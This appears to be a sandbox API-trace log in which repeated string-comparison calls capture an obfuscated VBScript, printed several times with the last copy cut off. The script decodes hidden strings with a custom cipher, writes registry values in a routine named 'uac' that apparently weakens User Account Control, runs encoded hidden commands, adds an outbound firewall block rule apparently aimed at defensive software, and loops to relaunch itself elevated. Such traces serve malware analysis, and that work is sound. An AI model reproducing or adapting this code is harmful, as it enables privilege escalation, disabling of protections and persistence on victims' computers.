bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 65 [0222.921] wcsncmp (_String1="ext\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0222.921] wcsncmp (_String1="xt\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107 [0222.921] wcsncmp (_String1="t\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0222.921] wcsncmp (_String1="\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 